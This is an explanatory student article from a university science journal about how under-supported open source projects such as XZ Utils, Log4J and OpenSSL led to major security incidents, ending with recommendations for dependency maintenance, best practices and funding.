Computer Science Issue I Volume XXV

Hacked: The overlooked and under-supported open source projects holding the Internet together

About the Author: Sophia Krugler

Sophia Krugler is a senior studying Computer Engineering and Computer Science at the University of Southern California. She has interned in Silicon Valley for the past three summers, during which she has worked with both open and closed source tools.

Abstract

Given how foundational the internet is to everyday life, one would think that the components sustaining it would be incredibly elusive and secure. The reality is a bit different. Although security is a top priority of internet technologies, the maintenance to ensure that level of security is extremely difficult. When you add in the fact that most of the components that support the internet rely on projects maintained by small groups of volunteers, you may start to question how security is prioritized.

Introduction

In March of this year, a Microsoft software engineer working after hours accidentally discovered malicious code with the potential to allow unauthorized remote access to millions of computers [1]. 

Had Andres Freund not noticed an unusually slow performance of SSH logins — the most common method of remotely logging into devices over the internet — and connected the slow performance to some puzzling errors he had noticed a few weeks prior, the hack would have soon infiltrated several distributions of the Linux Operating System [2], [3], [4]. To put it into perspective, the Linux Operating System runs 96.3% of the top one million web servers and powers 85% of smartphones [5].

You’re probably wondering how malicious code with the ability to “crack” the Linux kernel infiltrated these systems. What could have led to one of the most dangerous cyberattacks of all time boils down to a dependency on a small, open source project managed by a single volunteer [1].

The internet’s dependency on open source software

This incident brings into question whether our computer systems are as secure as we tend to believe. The short answer is no. The internet and the machines it consists of may seem to work like magic. But in reality, these systems are maintained by open source projects and voluntary efforts of individual contributors. 

Figure 1: A visualization of the internet’s dependency on volunteer projects [6].

The term “open source software” (OSS) refers to software that is publicly accessible, meaning anyone can view, duplicate, enhance, and redistribute it for free [7]. Websites like Github and Bitbucket host open source projects — they store the code, allow developers to make changes to it, and provide a public forum for discussing the project. OSS differs from proprietary software, which is privately owned by an enterprise and can only be modified by employees.

Figure 2:  The different roles for interacting with open source software.

OSS is nearly everywhere in our computer systems. A 2023 study scanned the code of 1,067 companies and found that 96% of the codebases contain open source software. The same study found that a given application uses an average of 526 open source components [8]. To give you an idea of just how widely used open source software is, here are a few examples:

Personal computers

Our personal laptops, smartphones, and other devices run open source software. One example is the Operating System (OS). The OS is the foundational software responsible for allocating hardware resources (like your CPU) to applications (like your web browser). Without it, your device would not work. Due to the OS’s ability to perform privileged operations, its security is incredibly important.

Linux is an example of an open source OS. Companies, such as Ubuntu, Debian, and RedHat, “fork”, or duplicate, the open source code of the Linux OS, make modifications, then distribute their versions [9]. These modified versions are called Linux distributions. There are also “closed source” Operating Systems, such as MacOS and Windows OS. But even closed source software can rely on open source projects.

Websites and applications

The websites or mobile applications that you interact with on a daily basis use open source “libraries” — collections of code that handle common tasks. For example, open source web development libraries like jQuery simplify the code needed to render visual components and communicate over the web [10]. If you’ve visited a few websites today, chances are you’ve indirectly interacted with jQuery. One report found that over 100,000 companies use jQuery in their tech stack [11].

One of the main benefits of making a tool open source is that more developers will see its source code and suggest improvements. Thus, open source tools can be more secure and reliable than software that is kept private, because of the increased number of developers reviewing and interacting with the code [12]. 

Figure 3: A diagram showcasing the types of contributors to open source projects [13].

At the same time, the opposite can be true. When misused or poorly maintained, the visibility and accessibility of OSS can lead to vulnerabilities and malicious code, as exemplified by the aforementioned XZ Utils incident. This scenario becomes more likely when projects lack the resources they need to invest in secure practices. As explained by Google developer Filippo Valsorda in a 2021 interview with MIT Technology Review, although “open-source runs the internet and, by extension, the economy … it is extremely common even for core infrastructure projects to have a small team of maintainers, or even a single maintainer that is not paid to work on that project” [14]. Failure to routinely update open source dependencies exacerbates these problems. A 2023 study found that 84% of codebases contain an open source vulnerability [8]. This large percentage is not because the teams that manage open source tools fail to fix known vulnerabilities, but rather because applications that rely on open source software use outdated versions of the code. Listed below are a few (of many) examples of OSS cybersecurity incidents.

A closer look at the XZ Utils backdoor

That small, one person project that could have enabled attackers to access millions of computers running the Linux OS is called XZ Utils. XZ Utils is a popular library that contains data compression and decompression algorithms, which are used to more efficiently store information [4]. XZ Utils is used by OpenSSH, another popular open source tool used for remotely logging into other devices. When you “SSH into” another computer through a tool like OpenSSH, it’s as if you are sitting in front of that computer, logging in. You can interact with the remote computer as if it’s actually in front of you. The XZ Utils backdoor gave attackers unauthorized SSH access into any computer using a version of OpenSSH that depended on a vulnerable version of XZ Utils. In other words, an unauthorized OpenSSH session could allow an individual to view sensitive information and compromise the health of the device.

The attacker(s) that introduced the malicious code carried out their plan over the span of more than two years. Back in 2021, a developer named Jian Tan began contributing to the XZ Utils project. In other words, Jian Tan copied the code, modified a few lines under the guise of improving it, and requested that their changes be accepted [2]. An XZ Utils maintainer needs to approve every change before the developer can “merge” into the official version of the code. Starting in 2022, another participant (or possibly, the same one?) named Jigar Kumar began complaining over the XZ Utils mailing list that changes were not being approved fast enough [1], [2]. Kumar and several other brand-new participants on the mailing list successfully pressured Lasse Collin, the longtime XZ Utils maintainer, to add another maintainer (Jian Tan) to the project.

Figure 4: Messages exchanged between Lasse Collin and Jigar Kumar before Jian Tan was added as a maintainer to XZ Utils [15]. See all messages from Jigar Kumar here.

With this authoritative role, Jian Tan gained the ability to modify the XZ Utils project without needing approval. Starting in January 2023, Jian Tan began making targeted changes to the project that went undetected, until Andres Freund noticed a few suspicious errors in March of 2024 [2]. 

Figure 5: A graph displaying Jian Tan’s commit history (in other words, modification history) on the XZ Utils project. See Jian Tan’s complete Github history here.

Thankfully, Freund discovered the vulnerability early on. However, several Linux distributions contained the malicious code, including Fedora 41, Fedora Rawhide, Alpine Linux, Arch Linux, Kali Linux, and Debian testing, unstable, and experimental versions [16]. Debian is one of the most widely used Linux distributions. Note that there are no confirmed reports of attackers using the XZ Utils backdoor [16].

Apache Log4J vulnerability

Apache Log4J is an open source tool that handles logging in Java programs (i.e. recording things like error messages and user inputs). A wide range of applications, including iCloud and Twitter, use Apache Log4J [14]. In December 2021, malicious individuals discovered a vulnerability in Log4J’s ability to communicate with other systems, which allowed hackers to inject malicious code into the logs, to then be executed by the system [17]. Soon after, programs aimed at exploiting this vulnerability circulated on GitHub, the most popular open source tool for sharing and managing code [17]. Anyone could download one of these programs and use it to execute malware on remote servers running Log4J. The discovery of the Log4J vulnerability soon led to millions of attempted attacks, many of which were successful [17]. Teams running software using vulnerable versions of Log4J rushed to take their systems offline to avoid such an attack. An updated version of the code was published shortly after, but many teams failed to upgrade their systems. A study conducted two years after the initial discovery found that of the 38,278 applications using Log4J surveyed, 38% still used vulnerable versions [18]. 

The Heartbleed Bug

The Heartbleed Bug is a vulnerability in the OpenSSL library which was discovered in April of 2014, with the potential to expose protected information. The bug remained “in the wild” for two years before researchers discovered it [19]. SSL (short for Secure Sockets Layer) is a set of encryption technologies that allow for private communication over the internet [20]. OpenSSL is a popular open source project that implements SSL. A bug in the OpenSSL code allowed two computers communicating over OpenSSL to see the memory contents of the other participant, exposing sensitive information like private keys and passwords [19]. The bug affected several companies, including Google, Yahoo, Netflix, and Facebook. Researchers at Codenomicon and Google Security discovered the heartbleed bug independently. These researchers worked with OpenSSL to create a fix before publicizing the vulnerability. Fixing the vulnerability before announcing it mitigated its potentially detrimental impacts [21]. Detecting attacks that exploit the Heartbleed Bug is extremely difficult. However, less than a week after the Heartbleed Bug was disclosed to the public, security firm Mandiant reported that it discovered a case of the Heartbleed Bug being used to gain access to the internal corporate network of an unnamed organization [22]. One of the scariest aspects of the Heartbleed Bug is that other attacks have occurred — we simply don’t know when or where.

What makes OSS uniquely vulnerable?

A common thread between many incidents pertaining to open source projects is their lack of resources and support. The XZ Utils project was understaffed, making the one maintainer susceptible to social engineering tactics that enabled a malicious actor authorized access to the repository [23]. At the time of the Apache Log4J incident, the project was run mainly by volunteers, who “may not have sufficient resources to prioritize security” [24]. The Heartbleed Bug occurred in part due to the limited testing and validation processes often found in projects managed by small teams [25]. The fallout of the XZ Utils, Apache Log4J, and OpenSSL incidents clearly demonstrate their importance to our digital ecosystem. These open source tools are depended on and profited on by companies worth millions and billions of dollars, yet they are maintained by small groups of often unpaid volunteers [14]. Something doesn’t feel right here.

Why not just get rid of open source?

If OSS is especially vulnerable, why not get rid of it? Why not return to a more traditional model, where all software is intellectual property that is owned and maintained by the larger projects that rely on it?

There are of course many types of open source projects. The open source projects discussed so far mainly fall under the same umbrella — they were created by a small group of individual contributors, made visible to the public, then adopted by larger projects after gaining popularity. On the other end of the spectrum are open source projects that started out as closed source projects. In fact, it is fairly common for companies to release previously proprietary projects to the public. One example is the Java programming language, which was originally developed by Sun Microsystems and is now one of the most popular languages of all time [13]. Another example is Kubernetes, a widely-used container orchestration platform originally developed by Google — who, by the way, has released over 7,000 open source projects in the last five years [26]. If companies are releasing previously in-house technology for free, then they must see some benefit in buying into the open source model, right? Regardless of the size and form of the project, there are several advantages to making a piece of software open source:

1. User innovation

The OSS ecosystem has had such success in part because it relies on the joint efforts of engineers that use open source technologies. This constant feedback loop speeds up the development process and leads to quicker discoveries of bugs and other issues [27].

2. Modularity

Open source software has also succeeded due to its modularity, and correspondingly decentralized nature. The open source ecosystem is a collection of small modular projects, rather than a few large codebases. This allows projects to be worked on in parallel and manages the complexity of the system [27].

3. Shared knowledge

Using open source tools is highly beneficial for developers — even the ones that don’t actively contribute to open source projects. Suppose you’re a developer working at a company that has created an internal tool to perform some task. You run into an issue when using this tool, and you can’t get to the bottom of it. You can’t just “Google” this particular issue, because the tool is only used within your company. Instead, you have to ask for help from a developer who works on the internal tool. If you had been using an open source tool to perform the task, chances are that at some point in the tool’s lifespan, someone else ran into the exact same problem. Chances are they posted about it in a public forum, and received guidance from other developers or maintainers of the project on how to resolve the issue. Boom — just like that, you’ve found a solution, and now you can get on with your work. This accumulation of public knowledge is one of the many benefits of using open source software.

Solutions

The advantages of OSS are significant enough to support its continued involvement in the massive and complex software ecosystems that run the world. Besides, OSS is so integrated into our systems that removing it completely is infeasible. However, most members of the software development community agree that more support for open source projects is needed.

Proactive protection from dependency failures

Organizations that profit on distributing software or providing services that rely on software should bear the consequences if and when that software fails — regardless of whether the failure was introduced internally. To protect themselves from risks of open source software, there are several actions that companies should (and already do) take. 

1. Keep dependencies up to date.

As mentioned earlier, a significant portion of codebases contain vulnerabilities stemming from open source software. This is in part due to a failure to update software dependencies. The 2024 Open Source Security and Risk Analysis Report (OSSRA) found that 14% of the codebases assessed for vulnerabilities contained vulnerabilities that were over ten years old, and that 91% of codebases assessed contained components “10 versions or more behind the most current version” [28].

2. Continuously assess security and reliability of dependencies.

One of the main pieces of guidance provided from the OSSRA is to simply know what’s in your code. This can be achieved by maintaining a list of open source  dependencies, regularly reviewing open source code, and staying informed on the status of open source projects [28].

3. Participate in open source dependencies.

Going one step beyond simply reading the code, companies can incentivize employees to be active contributors to open source projects, thus ensuring that the projects are properly maintained [28].

Adopting standard open source best practices

The open source projects themselves can reduce risk by adhering to standards like the Open Source Security Foundation’s (OpenSFF) best practices [29]. OpenSFF best practices include clearly defining the contribution process, stating requirements for acceptable contributions including required coding standards, and outlining how consumers can report vulnerabilities and bugs [30].

Funding

Of course, these measures are difficult to prioritize when open source projects are being maintained by small groups of unpaid volunteers. To ensure thorough development practices, and to fairly reward open source maintainers for their contributions, more funding for open source software is needed. 

Several organizations have committed to funding open source projects, including the Linux Foundation Core Infrastructure Initiative, the HOST program (which is funded by the Department of Homeland Security), and the Google Application Security Patch Reward Program [25]. The Core Infrastructure Initiative was created by the Linux Foundation in the aftermath of the Heartbleed Bug, and has since raised millions of dollars for improving security of open source tools. Contributors to the Core Infrastructure Initiative fund include Google, Facebook, Microsoft, Amazon, Intel, and many more [31].

Although initiatives like these are a step in the right direction, if the numerous OSS related problems over the past few decades are any indication, these efforts are simply not enough. As explained in Research Scientist Matthew L Levy’s article on open source cybersecurity risks, “While many major open source communities now have the advantage of corporate sponsorships and corporate employees paid for community participation, many widely used open source projects still do not“ [12]. Had projects like XZ Utils, Apache Log4J, and OpenSSL received support proportional to their impact, many of the recent cybersecurity scares likely would have never occurred.

Further Reading

Multimedia Resources

References

[1] K. Piper, “A hack nearly gained access to millions of computers. Here’s what we should learn from this.,” Vox, Apr. 12, 2024. https://www.vox.com/future-perfect/24127433/linux-hack-cyberattack-computer-security-internet-open-source-software (accessed Sep. 11, 2024).

[2] D. Goodin, “The XZ Backdoor: Everything You Need to Know,” WIRED, Apr. 02, 2024. https://www.wired.com/story/xz-backdoor-everything-you-need-to-know/#:~:text=XZ%20Utils%20is%20nearly%20ubiquitous (accessed Sep. 11, 2024).

[3] A. Freund, “A backdoor in xz [LWN.net],” lwn.net, Mar. 29, 2024. https://lwn.net/Articles/967194/ (accessed Sep. 11, 2024).

[4] C. Pernet, “XZ Utils Supply Chain Attack: A Threat Actor Spent Two Years to  Implement a Linux Backdoor,” TechRepublic, Apr. 08, 2024. https://www.techrepublic.com/article/xz-backdoor-linux/ (accessed Sep. 11, 2024).

[5] Branka, “Linux Statistics – TrueList 2022,” TrueList, Sep. 01, 2023. https://truelist.co/blog/linux-statistics/ (accessed Sep. 10, 2024).

[6] XKCD, “Dependency,” XKCD. Available: https://xkcd.com/2347 (accessed: Sep. 11, 2024).

[7] OpenSource, “What is open source?,” Opensource.com, 2019. https://opensource.com/resources/what-open-source (accessed Sep. 11, 2024).

[8] F. Bals, “Open Source Trends from the 2023 OSSRA | Synopsys Blog,” www.synopsys.com, Feb. 27, 2024. https://www.synopsys.com/blogs/software-security/open-source-trends-ossra-report.html (accessed Sep. 11, 2024).

[9] packagecloud, “10 most popular Linux distributions, and why they exist | Packagecloud Blog,” blog.packagecloud.io, Sep. 14, 2021. https://blog.packagecloud.io/10-most-popular-linux-distributions-and-why-they-exist/ (accessed Sep. 11, 2024).

[10] J. F. – js.foundation, “jQuery,” OpenJS Foundation.https://jquery.com/#:~:text=What%20is%20jQuery%3F (accessed Sep. 11, 2024).

[11] “Why developers like jQuery,” StackShare, 2021. https://stackshare.io/jquery  (accessed Sep. 11, 2024).

[12] M. L. Levy, “Cybersecurity Risks Unique to Open Source and What Communities Are Doing to Reduce Them,” Computer, vol. 56, no. 6, pp. 78–83, Jun. 2023, doi: https://doi.org/10.1109/mc.2023.3262903  (accessed Sep. 11, 2024).

[13] T. Kilamo, I. Hammouda, T. Mikkonen, and T. Aaltonen, “From proprietary to open source—Growing an open source ecosystem,” Journal of Systems and Software, vol. 85, no. 7, pp. 1467–1478, Jul. 2012, doi: https://doi.org/10.1016/j.jss.2011.06.071 (accessed: Sep. 05, 2024).

[14] P. O’Neill, “The internet runs on free open-source software. Who pays to fix it?,” MIT Technology Review, Dec. 17, 2021. https://www.technologyreview.com/2021/12/17/1042692/log4j-internet-open-source-hacking/ (accessed: Sep. 05, 2024).

[15] L. Collin and J. Kumar, “Re: [xz-devel] XZ for Java,” www.mail-archive.com, Jun. 08, 2022. https://www.mail-archive.com/xz-devel@tukaani.org/msg00567.html (accessed Sep. 19, 2024).

[16] R. Tatam, “XZ Utils, the xz Backdoor & What We Can Learn from Open Source CVEs | Puppet by Perforce,” Puppet by Perforce, 2024. https://www.puppet.com/blog/xz-backdoor (accessed Sep. 11, 2024).

[17] K. Gallo, “Log4J Vulnerability Explained: What It Is and How to Fix It | Built In,” builtin.com, Jun. 20, 2024. https://builtin.com/articles/log4j-vulerability-explained (accessed Sep. 11, 2024).

[18] C. Eng, “State of Log4j Vulnerabilities: How Much Did Log4Shell Change? | Veracode,” Veracode, Dec. 07, 2023. https://www.veracode.com/blog/research/state-log4j-vulnerabilities-how-much-did-log4shell-change (accessed Sep. 11, 2024).

[19] Synopsys, “Heartbleed Bug,” heartbleed.com, Jun. 03, 2020. https://heartbleed.com/ (accessed Sep. 11, 2024).

[20] T. B. Lee, “The internet, explained,” Vox, Jun. 16, 2014.https://www.vox.com/2014/6/16/18076282/the-internet (accessed Sep. 05, 2024).

[21] T. B. Lee, “The Heartbleed Bug, explained,” Vox, Jun. 19, 2014. https://www.vox.com/2014/6/19/18076318/heartbleed (accessed Sep. 11, 2024).

​​[22] C. Glyer and C. DiGiamo, “Attackers Exploit the Heartbleed OpenSSL Vulnerability to Circumvent Multi-factor Authentication on VPNs | Mandiant,” Google Cloud Blog, Apr. 18, 2014. https://cloud.google.com/blog/topics/threat-intelligence/attackers-exploit-heartbleed-openssl-vulnerability/ (accessed Sep. 20, 2024).

[23] IBM, “What is Social Engineering? | IBM,” www.ibm.com, 2024. https://www.ibm.com/topics/social-engineering (accessed Sep. 11, 2024).

[24] E. Schmidt and F. Long, “Protect Open-Source Software,” Wall Street Journal, Jan. 28, 2022. https://www.proquest.com/docview/2623235269 (accessed: Sep. 05, 2024).

[25] D. Wheeler and S. Khakimov, “Open Source Software Projects Needing Security Investments,” Institute for Defense Analyses, Jun. 2015. Accessed: Sep. 11, 2024. [Online]. Available: https://www.jstor.org/stable/resrep36518 

[26] S. Vargas, “2023 Open Source Contributions: A Year in Review,” Google Open Source Blog, Aug. 13, 2024. https://opensource.googleblog.com/2024/08/2023-open-source-contribution-report.html#:~:text=Over%20the%20last%205%20years (accessed Sep. 19, 2024).

[27] M. Osterloh and S. Rota, “Open source software development—Just another case of collective invention?,” Research Policy, vol. 36, no. 2, pp. 157–171, Mar. 2007, doi: https://doi.org/10.1016/j.respol.2006.10.004 (accessed Sep. 11, 2024).

[28] “Open Source Security Risk Analysis” Synopsys.com, 2024. https://www.synopsys.com/software-integrity/resources/analyst-reports/open-source-security-risk-analysis/thankyou.html#introMenu (accessed Sep. 20, 2024).

[29] “Best Practices Badge – Open Source Security Foundation,” Openssf.org, 2024. https://openssf.org/projects/best-practices-badge/ (accessed Sep. 20, 2024).

[30] “OpenSSF Best Practices,” Bestpractices.dev, 2024. https://www.bestpractices.dev/en/criteria/0 (accessed Sep. 20, 2024).

[31] Sean Michael Kerner, “Linux Foundation’s CII Continues to Fund Open-Source Security Efforts,” eWEEK, Feb. 10, 2015. https://www.eweek.com/security/linux-foundation-s-cii-continues-to-fund-open-source-security-efforts/ (accessed Sep. 19, 2024).

Similar Posts

Leave a Reply

Your email address will not be published. Required fields are marked *